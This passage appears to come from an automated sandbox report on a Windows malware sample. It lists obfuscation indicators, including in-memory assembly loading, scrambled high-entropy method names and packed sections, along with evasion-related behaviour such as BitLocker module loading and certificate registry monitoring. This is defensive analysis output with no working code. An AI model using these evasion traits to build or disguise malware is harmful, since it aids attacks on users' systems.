Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, aarSSMVkWAmtKa6FX3.cs	.Net Code: efgBMC4ntn System.Reflection.Assembly.Load(byte[])
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, aarSSMVkWAmtKa6FX3.cs	.Net Code: efgBMC4ntn System.Reflection.Assembly.Load(byte[])
Source: 0.2.M2AB8BeHc4.exe.5420000.3.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, aarSSMVkWAmtKa6FX3.cs	.Net Code: efgBMC4ntn System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 0_2_0544AED8 pushad ; ret	0_2_0544AED9
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FA891E pushad ; iretd	3_2_00FA891F
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FA8C2F pushfd ; iretd	3_2_00FA8C30
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FA8DDF push esp; iretd	3_2_00FA8DE0

Source: M2AB8BeHc4.exe

Static PE information: section name: .text entropy: 7.509647652044103

Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, Rk8PBciBiSBYWohifp.cs	High entropy of concatenated method names: 'dKEynmM6Y6', 'XcwyPLTNri', 'PwqLUU3jkp', 'JIyLRSkNH9', 'u5ByfRRJso', 'Wqjy0ONpGP', 'WdFy9KcLV1', 'b56yA2CO6q', 'jo7y3nfLAj', 'yu0y8Qbrvr'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, FB97pi0EIf030RntZN.cs	High entropy of concatenated method names: 'fjeMpJ9oV', 'Dal4TemVq', 'YXYjynNCU', 'KqOtVt3dB', 'f6MI4UDyI', 'rfIlEiZtB', 'mAsNRRo3TTJuBatNgV', 'WaCp9MGhpuJy2Krt0L', 'uuRLuNOlT', 'r7THgLEwS'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, xOwV2rqN3HIybOXuRW.cs	High entropy of concatenated method names: 'ToString', 'D5rpfi7da7', 'muApkDsxCj', 'jT0p2wE8FC', 'wNspY7JmDg', 'InypFsol1a', 'xqKpEV4Ov2', 'Jgcpb4XgXs', 'cY6pDelZJv', 'kQUpNRm7XC'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, vWr7qZvtpPUKNcvnsX.cs	High entropy of concatenated method names: 'unbVAuZMpA', 'gpAV3IDpnR', 'syEV84twlE', 'T73VZ5GGMS', 'bYKVJegoIn', 'yARVrVJiAc', 'WPCVQkEJg0', 'r0lVnOMNIa', 'T0LVuryYM7', 'vwIVPq4cqK'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, EHbmVhCyDwWHy8M2wq.cs	High entropy of concatenated method names: 'pY7g7qulVO', 'Cgcgm7TEo8', 'BZcgdg94ey', 'ViZdPKsK84', 'esjdzJSAEe', 'JgtgUZjKE1', 'UJtgRc5Cws', 'FtxgG39j8G', 'j8ogaLYhO9', 'AMogBb7Knq'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, mVv4BwGTrEfhV7fsTN.cs	High entropy of concatenated method names: 'kMjsOtw6Z9', 'CfxsIb2Tc0', 'Ui8sxDQPwE', 'WtIskAecnD', 'c4PsYYtL5I', 'gWqsFZXleB', 'ERRsbgOxGJ', 'xUisDU34ME', 'jcQsouOCOk', 'mS8sfdxn72'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, da8Eu84r1aafcM8ec9.cs	High entropy of concatenated method names: 'IA3L79UeHB', 'ebwLVGgXAY', 'IDgLmTInds', 'qsDL511GrP', 'bUGLdkaZ9b', 'A3JLghoTuA', 'JehLXWpp92', 'WPPLTUlNmu', 'TxWLv1TcRf', 'JedLqsOuj1'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, tOHCycnsm00ajto4xj.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'rQCGuvZNAs', 'GqEGPIfVWH', 'z5SGz8kj12', 'CqCaUN1I36', 'IchaR6IWFY', 'vfhaGsy6gR', 'RvXaaX280u', 'UbtULrlpgKlAZPwGX25'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, bU5e4ZOJUWaoc54F8dT.cs	High entropy of concatenated method names: 'o9b6ijIOYR', 'qst615jgeS', 'xZS6M6aY83', 'HNp64ZYocR', 'hkr6W48STJ', 'et16jgcTBN', 'rKk6taTOj5', 'bta6OxlQR5', 'Snl6IdJcLF', 'C5J6lTaqMi'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, wRYs5xzhuSewJSILcR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tEC6sG35ek', 'zFL6CrdgRr', 'af46p6w8B4', 'XPy6yOT0eW', 'qwv6LxTFGR', 'rVI66sgKuc', 'tZu6HKSwhG'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, JUBRyc3f0EAO1e93n8.cs	High entropy of concatenated method names: 'vTW6ROHs79', 'SFe6afhy2A', 'mvB6BlY3VO', 'JRt677UHV0', 'c4B6VgurI3', 'WdA659jAgq', 'eiM6doaJ8y', 'XJjLQbPcd5', 'jeNLn6AtpX', 'uRtLuJEoss'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, Wk9PGRQpVkphRBhS0i.cs	High entropy of concatenated method names: 'Kqf5WsBbk7', 'GeN5t8OgAd', 'b41m2kfvPU', 'eFImYaY7bC', 'VcymF7KnjS', 'TMamEPCE2C', 'wx4mb1Juu0', 'zT2mD0HD00', 'VSgmNdN7Ef', 'YySmoZuTXy'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, BfeNiZeJ6XlU9E8CGX.cs	High entropy of concatenated method names: 'SZLRgDItor', 'd0fRXfEWx2', 'N5fRvlIcG4', 'jicRqF5i9j', 'phxRCM42qo', 'tdNRpbDNR8', 'FEeb1GvpPl0jE43Pqs', 'URYOlW2wkjDRXMwaYj', 'hvKRRkWQZ0', 'lIWRaC4YkK'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, zBOlXQT4QdFSenvtsJ.cs	High entropy of concatenated method names: 'NFPLx24QSb', 'GjgLkRl06r', 'rYpL2NTewG', 'vPwLYKYHMo', 'ctNLAmVqGK', 'X2OLFMuL4u', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, aarSSMVkWAmtKa6FX3.cs	High entropy of concatenated method names: 'LHeawnur9R', 'vkva7DOOlx', 'PE0aVx7csy', 'h2oamgNKcO', 'n8Ta5JPaZW', 'H79adLKMty', 'iL2agtKm3A', 'NVUaXE6tK5', 'aHYaTwcEiM', 'nQsavFGmos'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, TAW28xHEeWboNFJ4hC.cs	High entropy of concatenated method names: 'Dispose', 'tMrRulN1Lt', 'CjrGk6ncgA', 'TeRccZduwu', 'DCCRPk8aBH', 'vEeRzqv1DR', 'ProcessDialogKey', 'LMtGUSP2qF', 'vHKGRXrqXV', 'xoBGGMUVmi'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, AXGq6aPLGZFRIp3d5y.cs	High entropy of concatenated method names: 'RkOdwOd1TR', 'HxgdVIwN2j', 'zaCd51776b', 'OvSdgYWrXS', 'dsBdXAuJuT', 'yP35JasNeE', 'n1e5rGokKn', 'pkD5QHWXaj', 'tTc5nT4kui', 'oSS5uM0w8b'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, YDnOgEAWUUyS1vp8Jx.cs	High entropy of concatenated method names: 'KUvm4M5FXI', 'MhLmj2ifwJ', 'CpkmOD9rUZ', 'r19mIGtrO6', 'U60mCM0qrt', 'FL6mpo3FPK', 'uEPmyncPKI', 'Ul4mLsgeRj', 'K5rm685UB8', 'y4YmHA6rWE'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, aW25yWOsKV0unxObb8O.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nEtHAE2TWc', 'V2bH3mtexO', 'KeMH8AmFFp', 'PX1HZbaBF2', 'RyXHJiXcwq', 'ONqHrwMG7s', 'WpGHQbLJcL'
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, e9lhFgEkBHDPfCQvFE.cs	High entropy of concatenated method names: 'Dxogi17wLA', 'IMYg1tZE0d', 'afagMjqpji', 'v1Pg4pg4lO', 'xZBgWMldsL', 'mLfgjhuvNu', 'fcOgtkPRB6', 'pbYgOGKcdI', 'E7sgIk4e19', 'wJyglCVwWG'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, Rk8PBciBiSBYWohifp.cs	High entropy of concatenated method names: 'dKEynmM6Y6', 'XcwyPLTNri', 'PwqLUU3jkp', 'JIyLRSkNH9', 'u5ByfRRJso', 'Wqjy0ONpGP', 'WdFy9KcLV1', 'b56yA2CO6q', 'jo7y3nfLAj', 'yu0y8Qbrvr'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, FB97pi0EIf030RntZN.cs	High entropy of concatenated method names: 'fjeMpJ9oV', 'Dal4TemVq', 'YXYjynNCU', 'KqOtVt3dB', 'f6MI4UDyI', 'rfIlEiZtB', 'mAsNRRo3TTJuBatNgV', 'WaCp9MGhpuJy2Krt0L', 'uuRLuNOlT', 'r7THgLEwS'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, xOwV2rqN3HIybOXuRW.cs	High entropy of concatenated method names: 'ToString', 'D5rpfi7da7', 'muApkDsxCj', 'jT0p2wE8FC', 'wNspY7JmDg', 'InypFsol1a', 'xqKpEV4Ov2', 'Jgcpb4XgXs', 'cY6pDelZJv', 'kQUpNRm7XC'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, vWr7qZvtpPUKNcvnsX.cs	High entropy of concatenated method names: 'unbVAuZMpA', 'gpAV3IDpnR', 'syEV84twlE', 'T73VZ5GGMS', 'bYKVJegoIn', 'yARVrVJiAc', 'WPCVQkEJg0', 'r0lVnOMNIa', 'T0LVuryYM7', 'vwIVPq4cqK'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, EHbmVhCyDwWHy8M2wq.cs	High entropy of concatenated method names: 'pY7g7qulVO', 'Cgcgm7TEo8', 'BZcgdg94ey', 'ViZdPKsK84', 'esjdzJSAEe', 'JgtgUZjKE1', 'UJtgRc5Cws', 'FtxgG39j8G', 'j8ogaLYhO9', 'AMogBb7Knq'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, mVv4BwGTrEfhV7fsTN.cs	High entropy of concatenated method names: 'kMjsOtw6Z9', 'CfxsIb2Tc0', 'Ui8sxDQPwE', 'WtIskAecnD', 'c4PsYYtL5I', 'gWqsFZXleB', 'ERRsbgOxGJ', 'xUisDU34ME', 'jcQsouOCOk', 'mS8sfdxn72'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, da8Eu84r1aafcM8ec9.cs	High entropy of concatenated method names: 'IA3L79UeHB', 'ebwLVGgXAY', 'IDgLmTInds', 'qsDL511GrP', 'bUGLdkaZ9b', 'A3JLghoTuA', 'JehLXWpp92', 'WPPLTUlNmu', 'TxWLv1TcRf', 'JedLqsOuj1'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, tOHCycnsm00ajto4xj.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'rQCGuvZNAs', 'GqEGPIfVWH', 'z5SGz8kj12', 'CqCaUN1I36', 'IchaR6IWFY', 'vfhaGsy6gR', 'RvXaaX280u', 'UbtULrlpgKlAZPwGX25'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, bU5e4ZOJUWaoc54F8dT.cs	High entropy of concatenated method names: 'o9b6ijIOYR', 'qst615jgeS', 'xZS6M6aY83', 'HNp64ZYocR', 'hkr6W48STJ', 'et16jgcTBN', 'rKk6taTOj5', 'bta6OxlQR5', 'Snl6IdJcLF', 'C5J6lTaqMi'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, wRYs5xzhuSewJSILcR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tEC6sG35ek', 'zFL6CrdgRr', 'af46p6w8B4', 'XPy6yOT0eW', 'qwv6LxTFGR', 'rVI66sgKuc', 'tZu6HKSwhG'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, JUBRyc3f0EAO1e93n8.cs	High entropy of concatenated method names: 'vTW6ROHs79', 'SFe6afhy2A', 'mvB6BlY3VO', 'JRt677UHV0', 'c4B6VgurI3', 'WdA659jAgq', 'eiM6doaJ8y', 'XJjLQbPcd5', 'jeNLn6AtpX', 'uRtLuJEoss'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, Wk9PGRQpVkphRBhS0i.cs	High entropy of concatenated method names: 'Kqf5WsBbk7', 'GeN5t8OgAd', 'b41m2kfvPU', 'eFImYaY7bC', 'VcymF7KnjS', 'TMamEPCE2C', 'wx4mb1Juu0', 'zT2mD0HD00', 'VSgmNdN7Ef', 'YySmoZuTXy'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, BfeNiZeJ6XlU9E8CGX.cs	High entropy of concatenated method names: 'SZLRgDItor', 'd0fRXfEWx2', 'N5fRvlIcG4', 'jicRqF5i9j', 'phxRCM42qo', 'tdNRpbDNR8', 'FEeb1GvpPl0jE43Pqs', 'URYOlW2wkjDRXMwaYj', 'hvKRRkWQZ0', 'lIWRaC4YkK'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, zBOlXQT4QdFSenvtsJ.cs	High entropy of concatenated method names: 'NFPLx24QSb', 'GjgLkRl06r', 'rYpL2NTewG', 'vPwLYKYHMo', 'ctNLAmVqGK', 'X2OLFMuL4u', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, aarSSMVkWAmtKa6FX3.cs	High entropy of concatenated method names: 'LHeawnur9R', 'vkva7DOOlx', 'PE0aVx7csy', 'h2oamgNKcO', 'n8Ta5JPaZW', 'H79adLKMty', 'iL2agtKm3A', 'NVUaXE6tK5', 'aHYaTwcEiM', 'nQsavFGmos'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, TAW28xHEeWboNFJ4hC.cs	High entropy of concatenated method names: 'Dispose', 'tMrRulN1Lt', 'CjrGk6ncgA', 'TeRccZduwu', 'DCCRPk8aBH', 'vEeRzqv1DR', 'ProcessDialogKey', 'LMtGUSP2qF', 'vHKGRXrqXV', 'xoBGGMUVmi'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, AXGq6aPLGZFRIp3d5y.cs	High entropy of concatenated method names: 'RkOdwOd1TR', 'HxgdVIwN2j', 'zaCd51776b', 'OvSdgYWrXS', 'dsBdXAuJuT', 'yP35JasNeE', 'n1e5rGokKn', 'pkD5QHWXaj', 'tTc5nT4kui', 'oSS5uM0w8b'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, YDnOgEAWUUyS1vp8Jx.cs	High entropy of concatenated method names: 'KUvm4M5FXI', 'MhLmj2ifwJ', 'CpkmOD9rUZ', 'r19mIGtrO6', 'U60mCM0qrt', 'FL6mpo3FPK', 'uEPmyncPKI', 'Ul4mLsgeRj', 'K5rm685UB8', 'y4YmHA6rWE'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, aW25yWOsKV0unxObb8O.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nEtHAE2TWc', 'V2bH3mtexO', 'KeMH8AmFFp', 'PX1HZbaBF2', 'RyXHJiXcwq', 'ONqHrwMG7s', 'WpGHQbLJcL'
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, e9lhFgEkBHDPfCQvFE.cs	High entropy of concatenated method names: 'Dxogi17wLA', 'IMYg1tZE0d', 'afagMjqpji', 'v1Pg4pg4lO', 'xZBgWMldsL', 'mLfgjhuvNu', 'fcOgtkPRB6', 'pbYgOGKcdI', 'E7sgIk4e19', 'wJyglCVwWG'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, Rk8PBciBiSBYWohifp.cs	High entropy of concatenated method names: 'dKEynmM6Y6', 'XcwyPLTNri', 'PwqLUU3jkp', 'JIyLRSkNH9', 'u5ByfRRJso', 'Wqjy0ONpGP', 'WdFy9KcLV1', 'b56yA2CO6q', 'jo7y3nfLAj', 'yu0y8Qbrvr'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, FB97pi0EIf030RntZN.cs	High entropy of concatenated method names: 'fjeMpJ9oV', 'Dal4TemVq', 'YXYjynNCU', 'KqOtVt3dB', 'f6MI4UDyI', 'rfIlEiZtB', 'mAsNRRo3TTJuBatNgV', 'WaCp9MGhpuJy2Krt0L', 'uuRLuNOlT', 'r7THgLEwS'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, xOwV2rqN3HIybOXuRW.cs	High entropy of concatenated method names: 'ToString', 'D5rpfi7da7', 'muApkDsxCj', 'jT0p2wE8FC', 'wNspY7JmDg', 'InypFsol1a', 'xqKpEV4Ov2', 'Jgcpb4XgXs', 'cY6pDelZJv', 'kQUpNRm7XC'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, vWr7qZvtpPUKNcvnsX.cs	High entropy of concatenated method names: 'unbVAuZMpA', 'gpAV3IDpnR', 'syEV84twlE', 'T73VZ5GGMS', 'bYKVJegoIn', 'yARVrVJiAc', 'WPCVQkEJg0', 'r0lVnOMNIa', 'T0LVuryYM7', 'vwIVPq4cqK'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, EHbmVhCyDwWHy8M2wq.cs	High entropy of concatenated method names: 'pY7g7qulVO', 'Cgcgm7TEo8', 'BZcgdg94ey', 'ViZdPKsK84', 'esjdzJSAEe', 'JgtgUZjKE1', 'UJtgRc5Cws', 'FtxgG39j8G', 'j8ogaLYhO9', 'AMogBb7Knq'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, mVv4BwGTrEfhV7fsTN.cs	High entropy of concatenated method names: 'kMjsOtw6Z9', 'CfxsIb2Tc0', 'Ui8sxDQPwE', 'WtIskAecnD', 'c4PsYYtL5I', 'gWqsFZXleB', 'ERRsbgOxGJ', 'xUisDU34ME', 'jcQsouOCOk', 'mS8sfdxn72'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, da8Eu84r1aafcM8ec9.cs	High entropy of concatenated method names: 'IA3L79UeHB', 'ebwLVGgXAY', 'IDgLmTInds', 'qsDL511GrP', 'bUGLdkaZ9b', 'A3JLghoTuA', 'JehLXWpp92', 'WPPLTUlNmu', 'TxWLv1TcRf', 'JedLqsOuj1'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, tOHCycnsm00ajto4xj.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'rQCGuvZNAs', 'GqEGPIfVWH', 'z5SGz8kj12', 'CqCaUN1I36', 'IchaR6IWFY', 'vfhaGsy6gR', 'RvXaaX280u', 'UbtULrlpgKlAZPwGX25'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, bU5e4ZOJUWaoc54F8dT.cs	High entropy of concatenated method names: 'o9b6ijIOYR', 'qst615jgeS', 'xZS6M6aY83', 'HNp64ZYocR', 'hkr6W48STJ', 'et16jgcTBN', 'rKk6taTOj5', 'bta6OxlQR5', 'Snl6IdJcLF', 'C5J6lTaqMi'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, wRYs5xzhuSewJSILcR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tEC6sG35ek', 'zFL6CrdgRr', 'af46p6w8B4', 'XPy6yOT0eW', 'qwv6LxTFGR', 'rVI66sgKuc', 'tZu6HKSwhG'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, JUBRyc3f0EAO1e93n8.cs	High entropy of concatenated method names: 'vTW6ROHs79', 'SFe6afhy2A', 'mvB6BlY3VO', 'JRt677UHV0', 'c4B6VgurI3', 'WdA659jAgq', 'eiM6doaJ8y', 'XJjLQbPcd5', 'jeNLn6AtpX', 'uRtLuJEoss'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, Wk9PGRQpVkphRBhS0i.cs	High entropy of concatenated method names: 'Kqf5WsBbk7', 'GeN5t8OgAd', 'b41m2kfvPU', 'eFImYaY7bC', 'VcymF7KnjS', 'TMamEPCE2C', 'wx4mb1Juu0', 'zT2mD0HD00', 'VSgmNdN7Ef', 'YySmoZuTXy'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, BfeNiZeJ6XlU9E8CGX.cs	High entropy of concatenated method names: 'SZLRgDItor', 'd0fRXfEWx2', 'N5fRvlIcG4', 'jicRqF5i9j', 'phxRCM42qo', 'tdNRpbDNR8', 'FEeb1GvpPl0jE43Pqs', 'URYOlW2wkjDRXMwaYj', 'hvKRRkWQZ0', 'lIWRaC4YkK'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, zBOlXQT4QdFSenvtsJ.cs	High entropy of concatenated method names: 'NFPLx24QSb', 'GjgLkRl06r', 'rYpL2NTewG', 'vPwLYKYHMo', 'ctNLAmVqGK', 'X2OLFMuL4u', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, aarSSMVkWAmtKa6FX3.cs	High entropy of concatenated method names: 'LHeawnur9R', 'vkva7DOOlx', 'PE0aVx7csy', 'h2oamgNKcO', 'n8Ta5JPaZW', 'H79adLKMty', 'iL2agtKm3A', 'NVUaXE6tK5', 'aHYaTwcEiM', 'nQsavFGmos'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, TAW28xHEeWboNFJ4hC.cs	High entropy of concatenated method names: 'Dispose', 'tMrRulN1Lt', 'CjrGk6ncgA', 'TeRccZduwu', 'DCCRPk8aBH', 'vEeRzqv1DR', 'ProcessDialogKey', 'LMtGUSP2qF', 'vHKGRXrqXV', 'xoBGGMUVmi'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, AXGq6aPLGZFRIp3d5y.cs	High entropy of concatenated method names: 'RkOdwOd1TR', 'HxgdVIwN2j', 'zaCd51776b', 'OvSdgYWrXS', 'dsBdXAuJuT', 'yP35JasNeE', 'n1e5rGokKn', 'pkD5QHWXaj', 'tTc5nT4kui', 'oSS5uM0w8b'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, YDnOgEAWUUyS1vp8Jx.cs	High entropy of concatenated method names: 'KUvm4M5FXI', 'MhLmj2ifwJ', 'CpkmOD9rUZ', 'r19mIGtrO6', 'U60mCM0qrt', 'FL6mpo3FPK', 'uEPmyncPKI', 'Ul4mLsgeRj', 'K5rm685UB8', 'y4YmHA6rWE'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, aW25yWOsKV0unxObb8O.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nEtHAE2TWc', 'V2bH3mtexO', 'KeMH8AmFFp', 'PX1HZbaBF2', 'RyXHJiXcwq', 'ONqHrwMG7s', 'WpGHQbLJcL'
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, e9lhFgEkBHDPfCQvFE.cs	High entropy of concatenated method names: 'Dxogi17wLA', 'IMYg1tZE0d', 'afagMjqpji', 'v1Pg4pg4lO', 'xZBgWMldsL', 'mLfgjhuvNu', 'fcOgtkPRB6', 'pbYgOGKcdI', 'E7sgIk4e19', 'wJyglCVwWG'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
